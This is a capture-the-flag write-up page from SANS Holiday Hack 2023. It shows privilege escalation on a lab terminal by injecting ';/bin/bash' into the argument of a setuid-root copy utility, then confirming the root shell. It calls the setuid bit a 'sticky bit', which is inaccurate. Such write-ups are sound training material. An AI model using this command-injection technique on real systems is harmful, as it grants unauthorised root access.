SANS Holiday Hack 2023
  • 🌴Overview
  • 🆙Linux PrivEsc
  • 🃏Na'an
  • 🎣Phish Detection Agency
  • 😼Hashcat
  • 🧝Elf Hunt
  • 🐚Certificate SSHenanigans
  • 📒Active Directory
  • 🚪Space Island Door Access Speaker
  • 📸Camera Access
  • 🚀Missile Diversion
  • 🏴‍☠️I'm Gonna be King of the Pirates!
Powered by GitBook
On this page
  • Objective Description
  • Solution

Linux PrivEsc

Location: Island of Misfit Toys: Ostrich Saloon

PreviousOverviewNextNa'an

Last updated 1 year ago

Objective Description

Find a method to escalate privileges inside this terminal and then run the binary in /root

Solution

While we enumerate for potential paths to elevate our privileges, we find a binary named "simplecopy" that has the user sticky bit set.

Because this binary has the sticky bit set for user, it will run with the privileges of the owner. Since the owner is root, exploiting it may give us root privs.

elf@297f9110cc92:~$ /usr/bin/simplecopy 
Usage: /usr/bin/simplecopy <source> <destination>

It appears that it is indeed a simple copy utility. We find that we are able to inject commands into the arguments for this binary. Using this vulnerability, we can spawn a shell as Root & run the binary specified in the objective to complete this challenge.

elf@297f9110cc92:~$ /usr/bin/simplecopy /tmp/ ";/bin/bash"
cp: missing destination file operand after '/tmp/'
Try 'cp --help' for more information.
root@297f9110cc92:~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root),1000(elf)
🆙
Page cover image
Terminal
Enumeration
File Permissions
Priv Esc